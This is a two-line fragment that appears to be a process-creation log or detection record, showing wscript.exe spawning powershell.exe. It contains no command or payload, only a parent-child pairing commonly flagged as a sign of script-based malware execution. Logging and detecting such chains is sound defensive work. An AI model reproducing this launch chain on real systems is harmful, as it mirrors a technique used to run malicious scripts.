Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |